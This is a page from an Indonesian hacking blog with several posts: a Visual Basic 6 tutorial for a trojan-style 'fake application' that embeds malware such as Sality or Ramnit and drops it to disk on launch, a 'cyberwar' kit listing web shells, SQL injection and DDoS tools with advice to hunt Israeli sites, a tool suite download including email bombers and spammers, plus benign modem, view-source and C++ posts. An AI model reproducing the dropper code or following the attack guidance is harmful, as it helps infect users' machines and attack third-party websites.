468x60 Ads

Demo image Demo image Demo image Demo image Demo image >

CARA MEMBUAT FAKE APPLICATION

0 komentar

Pada tutorial ini, saya ingin memberi contoh Fake Application yang melakukan aksi Drop File Executable, seperti beberapa tipe Trojan yang jika dijalankan terlihat seperti program biasa tetapi secara diam-diam melakukan ekstrak [drop] file lainnya kemudian file hasil ekstrak di eksekusi untuk menjalankan aksinya..
Aplikasi Palsu - Fake Application
Oke, langsung pada cara pembuatan, pertama buka Microsoft Visual Basic 6 anda, buat project baru dengan tipe standar EXE, kemudian buat 1 form baru.
Pilih Menu Tools – Resource Editor,lalu klik icon Add Custom Resource
Lihat gambar:
Pilih file executable yang anda inginkan misalnya Sality atau Ramnit juga boleh. Kemudian Open, file yang akan dibuat menjadi resource file ber-ekstensi .RES, sehingga bisa disimpan ke dalam program. File executable bisa anda pack dahulu dengan UPX, Mpress dan sebagainya agar ukuran file menjadi lebih kecil.
Ketika akan menyimpan resource ,beri nama sesuai keinginan anda misalnya project1.RES
Setelah sukses “melampirkan” malware atau program lain kedalam program utama, maka ketik kode berikut pada form :
 ’membuat fungsi KeluarkanFile untuk ekstrak file
Private Function KeluarkanFile(JenisRes As String, IDRes As Long, OFile As String)
Dim DROP() As Byte
DROP = LoadResData(IDRes, JenisRes)
Open OFile For Binary As #1
Put #1, , DROP
Close #1
End Function
‘fungsi ini akan dipanggil ketika program diload ke memori
Private Sub Form_Load()
‘fungsi keluarkanfile dipanggil saat program dieksekusi,ganti nama hehe.exe sesuai keinginan anda
KeluarkanFile “CUSTOM”, 101, App.Path & “\hehe.exe”
Msgbox “File berhasil di ekstrak”,vbinformation,”Info”
End Sub
Save project kemudian run saja, maka akan muncul  file bernama hehe.exe di direktori yang sama dengan project anda berada
Catatan: program tidak langsung menjalankan file hasil ekstrak, silahkan tambahkan sendiri kodenya.

SETTING MODEM DI LINUX

0 komentar


Kali ini saya akan berbagi cara setting modem USB di linux. Ada beberapa aplikasi untuk setting modem di Linux, namun kali ini saya akan menjelaskan setting modem dengan  PPPConfig dan Mobile Partner. Tanpa basa basi lagi langsung aja ke TKP.
Setting Modem USB dengan PPPCONFIG di Linux
Pertama kita gunakan perintah dmesg untuk mengecek lokasi modem.
Langkah selanjutnya kita gunakan pppconfig untuk mengkonfigurasi modem
# pppconfig
Langkah selanjutnya pada tampilan pppconfig:
  1. Pilih Create a connection
  2. Pada provider name masukkan nama provider yang akan kita gunakan pada perintah pon, contohnya    xl, telkomsel, smart, 3, dll. Karena saya menggunakan 3 maka saya tulis 3. Lalu pilih Ok
  3. Pada configure name server (DNS) pilih Dynamic. Lalu OK
  4. Pada authentication method pilih PAP. Lalu OK
  5. Pada username, isikan username dari ISP kita contohnya: 3data. Lalu OK
  6. Pada password, isikan password dari ISP kita contohnya: 3data. Lalu OK
  7. Pada speed biarkan default. Lalu OK
  8. Pada pulse or tone pilih tone. Lalu OK
  9. Pada phone number masukkan *99# untuk GSM atau *777# untuk CDMA. Lalu OK
  10. Pada choose configuration method pilih Yes
  11. Pada manually select modem port masukkan alamat modem kita. Karena modem saya terdeteksi ttyUSB0 pada langkah pertama jadi saya isikan seperti ini : /dev/ttyUSB0 Lalu OK
  12. Pada tampilan terakhir pilih Finished write your files and return to menu
  13. Keluar dari pppconfig
Langkah selanjutnya adalah mengkoneksikan settingan yang sudah kita buat dengan program pon
# pon <nama_provider>
Contohnya:
# pon 3
Selanjutnya, kita cek deh dengan ping ke google…
Jika sudah bisa melakukan PING berarti modem telah terkoneksi ke internet.
Jika dengan cara ini tidak berhasil maka kita gunakan cara kedua yaitu dengan menginstal Mobile Partner(Versi Linux) , aplikasi modem connector bawaan modem, namun hanya beberapa modem saja yang dapat terdeteksi oleh mobile partner.
Pertama Download dulu aplikasinya DISINI

Lalu install dengan cara seperti di bawah ini
1. Extract file yang telah kita download tadi ke tempat yang di inginkan (saya mengextract nya ke root)
2. Buka console/terminal, lalu ketikkan
# bash /<path>/Install
Contoh: bash ~/Modem/install  *tuliskan perintah ini apa bila anda mengextract di root*
3. Akan terdapat tampilan prompt
Please input the install path[/usr/local/Mobile_Partner] :
4. Masukkan dimana aplikasi ini akan diinstall, jika tidak ingin diubah lokasi path-nya (default) langsung saja tekan Enter.
5.  Tunggu sampai proses instalasi selesai
Finished, press any key to exit
6. Jalankan Mobile Partner yang telah ada di desktop atau di Application –> Internet
7. Jangan lupa setting profil nya dulu , caranya sama seperti mobile partner di windows
Kedua cara di atas telah saya coba di system operasi Bactrack 5 dan Ubuntu 10.10, dengan menggunakan modem huwawei E173

CARA MELIHAT SOURCE CODE WEBSITE

0 komentar


Kali ini saya tutorial sederhana tentang cara melihat source code web yang di proteksi oleh Anti Klik Kanandan Anti CTRL+U, kebetulan saya menggunakan Mozilla Firefox sebagai browser.
Contohnya adalah halaman deface’annya orang, nah saya pengen tau keindahan source code orang itu, mari kita lanjutkan:
anonk7 1
Langkahnya:
1. Klik Tools -> Web Developer -> Page Source
Anonk7 2
2. Udah kelihatan tuh source code + biang kerok anti klik kanannya!
AnonK7 3
Mudah mudahan tutorial sederhana kali ini berkenan di hati agan agan dan bermanfaat untuk pembelajaran.

CYBERWAR SOFTWARE FREE DOWNLOAD

1 komentar


Kami akan berbagi peralatan tempur yang biasa digunakan untuk perang dunia maya / cyber war, semoga dengan hal ini kita akan lebih mudah dalam menyampaikan pesan perdamaian.

Perang Cyber – Perang Dunia Maya – Cyber War
Peralatan penting diantaranya:

1. OPERATING SYSTEMS

Operating system merupakan bagian paling vital dalam upaya cyberwar, sebagai pondasi awal untuk memulai peperangan cyber.
Beberapa OS berikut yang paling digunakan untuk cyberwar dan penetration testing.
  1. BACKTRACK 5 R3
    Pada operating system ini sudah terdapat beberapa tools standard yang memang digunakan untuk penetration testing dan didalamnya sudah terdapat METASPLOIT. OS ini sangat cocok digunakan untuk perang cyber.
  2. WINDOWS OS (XP/Vista/7/8)
    Windows adalah os yang paling umum digunakan dan sangat berguna juga untuk melakukan penetration testing, kekurangan dari windows adalah kita harus menambahkan aplikasi untuk menjalankan tools yang berbahasa pemrograman seperti python, ruby, perl, dll.
Anda bisa melakukan dual booting terhadap OS tersebut atau bisa menggunakan virtual machine seperti VMware. Alternatif lain bisa juga anda gunakan seperti, BlackBuntu, BlackOS, dll.

2. PETUNJUK & TUTORIAL HACKING, CRACKING, DEFACE, DLL

Anda bisa menemukan petunjuk untuk melakukan exploit, hacking, cracking dan deface diberbagai situs yang sudah menyediakan tutorial seperti www.binushacker.net.
Alternatif lainnya yang paling bisa digunakan:
  1. YOUTUBE & VIMEO
    Siapa yang tidak kenal dengan YouTube & Vimeo, merupakan situs yang menyediakan video-video, tak terkecuali video tentang tutorial hacking, cracking, defacing, dll. Apabila tidak mengetahui bagaimana cara untuk cyberwar, tinggal cari dan lihat videonya di website ini. Sudah sangat banyak video tutorial diwebsite ini.
    Website: www.youtube.com & www.vimeo.com
  2. SECURITY TUBE
    Situs ini merupakan situs yang spesifik menyediakan seluruh kumpulan video mengenai security dan hacking, sangat cocok untuk belajar teknik-teknik hacking, exploiting, cracking, defacing, fuzzing, dll.
    Website: www.securitytube.net

3. VULNERABILITY INFORMATION

Selain anda memiliki exploit sendiri (undisclosed exploit) yang tidak disebarkan, anda juga bisa menggunakan free vulnerability yang sudah dipublikasikan di website-website berikut untuk mempermudah anda dalam menemukan kelemahan lawan.
Beberapa website yang bisa digunakan adalah sebagai berikut:
  1. EXPLOIT DATABASE
    Exploit database adalah kelanjutan dari milw0rm dimana dikolaborasikan dengan google hacking database (GHDB). Diwebsite ini akan banyak ditemukan berbagai kelemahan website baik yang memiliki kelemahan remote, local atau di webaplikasi:
    Website: www.exploit-db.com
  2. SECURITY FOCUS
    Situs ini hampir sama dengan Exploit-DB dan merupakan salah satu favorit team binushacker dalam mencari kelemahan, karena security focus sudah dibangun sejak lama. Disini akan ditemukan kelemahan-kelemahan website dari yang sudah lama sampai dengan yang terbaru. Sangat cocok untuk melakukan testing disegala aspek kelemahan terutama aplikasi web.
    Website: www.securityfocus.com

4. TOOLS, SCANNER & SEARCH ENGINE

Berikut adalah bagaian paling penting dalam peralatan perang, yaitu kumpulan tools untuk scan, exploit dan pawning.
Kumpulan tools yang biasa dan sering digunakan adalah:
  1. SQL INJECTION TOOLS
    SQL Injection merupakan kelemahan yang paling populer dalam dunia hacking khususnya yang berupa web application, yang bisa digunakan juga di berbagai database engine. Adapaun tools yang direkomendasikan adalah
    SQLMAP: merupakan tools yang sangat powerfull untuk melakukan sql injection secara otomatis.
    SQLCAKE: merupakan tools keren yang khusus dibuat untuk melakukan sql injection bisa dilakukan secara manual dan otomatis.
    WEBAPPEX: merupakan web application exploiter, dimana didalamnya menggunakan engine Havij sebagai SQL injectionnya, sangat powerfull dan merupakan salah satu favorite tools.
  2. REMOTE SHELL TOOLS
    Remote shell tools merupakan tools yang wajib untuk dimiliki yang bisa di gunakan untuk exploitasi, download dan upload file. Eksekusi perintah-perintah baik yang ada di linux, bsd, freebsd dan windows.
    C100 SHELL: merupakan sebuah tools exploitasi yang berbasis php dengan banyak fungsi didalamnya untuk eksekusi command, bypass, upload, download file, dll. Digunakan untuk *nix.
    ASPYX SHELL: merupakan sebuah tools exploitasi yang berbasis aspx dengan banyak fungsi didalamnya untuk eksekusi command, bypass, upload, download file, dll. Digunakan untuk *windows.
    EFSO SHELL: merupakan sebuah tools exploitasi yang berbasis asp dengan banyak fungsi didalamnya untuk eksekusi command, bypass, upload, download file, dll. Digunakan untuk *windows.
  3. NETWORK DAN WEB APPLICATION SCANNER
    Network scanner digunakan untuk melakukan scan terhadap network target, mengumpulkan data dan informasi mengenai network yang digunakan oleh lawan. Sedangkan Webscanner digunakan untuk menemukan kelemahan lawan yang berbasis web aplikasi.
    NMAP: merupakan tools yang digunakan untuk mencari dan melakukan scanning terhadap network lawan.
    WEBVULNSCAN: merupakan tools untuk mencari kelemahan website.
    RA2 BLACKBOX: merupakan sebuah tools untuk melakukan scanning terhadap kelemahan XSS.
  4. DISTRIBUTED DENIA OF SERVICE (DDOS) TOOLS
    Tools ini digunakan untuk mematikan server secara sementara dengan teknik membajiri website dengan request hingga website tersebut overload dan tidak dapat diakses. List DDOS tool sebagai berikut:
    SLOWLORIS: ddos tools yang dibuat oleh Rsnake, sangat powerful untuk check IIS server dan web aplikasi, sampai saat ini masih banyak digunakan.
    HULK: ddos tools untuk melakukan load terhadap http request.
    TOR HAMMER: tools ddos yang bisa dilakukan dengan menggunakan Tor application, terutama untuk server yang berbasis apache.
    LOIC: tools DDOS yang paling banyak digunakan oleh Anonymous, silakan dicoba.
  5. SEARCH ENGINE
    Search engine merupakan alat terakhir yang perlu untuk digunakan untuk mencari website-website yang terdaftar. Misalkan anda akan mencari kelemahan website Israel tinggal gunakan keyword: *.il (Israel):
    Google: search engine paling populer saat ini dan merupakan website no. 1 yang paling dikunjungi di dunia.
    Website: www.google.com
    Yahoo!: merupakan tools untuk mencari kelemahan website.
    Website: www.yahoo.com
    Bing: merupakan sebuah tools untuk melakukan scanning terhadap kelemahan XSS.
    Website: www.bing.com
Selanjutnya dengan mengetahui semua kebutuhan perang, anda telah memiliki langkah awal yang baik sebagai persiapan. Kemudian berikut adalah petunjuk yang bisa di praktekkan step-by-stepnya:
Nah, diatas merupakan tools dan petunjuk yang diperlukan untuk melakukan peperangan di dalam dunia cyber, selanjutnya kami serahkan kepada anda apakah akan menggunakan tools tersebut atau akan menggunakan tools lain yang sudah dimiliki saat ini.
Selamat mempersiapkan diri dan berpartisipasi dalam peperangan dunia cyber. Semoga sukses dan berhasil!

BELAJAR PROGRAMMING DENGAN C++

0 komentar


Berikut kami share beberapa contoh hasil pemrograman dengan menggunakan C++, disertai dengan tutorial C++, semoga hal ini bisa mempercerah dan membantu untuk lebih semangat dalam coding :)
Belajar Bahasa Pemrograman C++
Oke, mari kita lanjutkan ke artikel berikut:

Contoh Program Array Menggunakan Index

Kali ini saya akan membuat sebuah dasar untuk pemrograman C++, ingat artikel ini jangan hanya di copas hanya untuk keperluan tugas anda di kampus maupun di sekolah, saya disini tidak akan memberikan listing program yang bisa di copas , maka dari itu kalian
harus menyalinnya dengan benar. saya hanya akan memberikan scrreen shotnya, apabila kalian yang malas menyalinnya
Dan ini merupakan gambar listing codenya:
Disini terjadi penggantian indeks sesuai dengan indeks yang ingin diganti, misalnya indek pertama bil awal 15 bisa digantikan dengan kode 2.
Tampilan screen shoot program ketika sudah dibuat:

Program Mencari Nilai Minimum dan Maximum C++

Kali ini saya akan lagi memposting sebuah source program menggunakan borlan C++, mungkin sedikit berbeda syntaxnya dengan program C yang lain.
Sekarang saya akan membuat kan suatu source code C++ yaitu mencari nilai terbesar dan terkecil. Saya buatnya dalam bentuk image supaya semuanya bisa belajar, kecuali saya .. Hhe :)
Langsung saja ini gambar code / syntaxnya:
Dan ini hasil print screennya:
Itulah program dari saya, apabila ada pertanyaan anda bisa sms ke saya.
Cara yang lainnya:
Nah apakah sesuai dengan apa yang anda inginkan…..?
Source codenya ini:
Screen shot program yang uda di compile:
Penjelasannya dikit aja ya… :)
Float digunakan untuk menentukan jumlah indeks yang bisa di input, i disimpan dalam sebuah fungsi lalu digunakan perulangan, yaitu menggunakan for (i=0;i<10 br=”br” i=”i”>jadi artinya i melakuakan perbandingan antara sepuluh indeks.

FREE DOWNLOAD NET TOOLS 5

0 komentar



Buat agan agan yang mau belajar jadi admin jarinagn cocok banget nih agan tinggal buat aja server sediri di rumah. Ane udah coba aplikasi ini dengan cara ane buat mail server, web server, ftp server sendiri di rumah lalu ane serang pake aplikasi ini jadi ane bisa tau dimana kelemahan server yang ane buat.
Tanpa berlama lama lagi langsung aja donlot aplikasi nya:
Ini dia penampakan aplikasi nya
Net Tools - BinusHacker
Tampilan beberapa fungsinya:
Net Tools - BinusHacker
Net Tools - BinusHacker
Fungsinya:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)
**PERHATIAN : Gunakan aplikasi ini sebaik baiknya, gunakanlah untuk pembelajaran bukan untuk merugikan orang lain
Sekian :)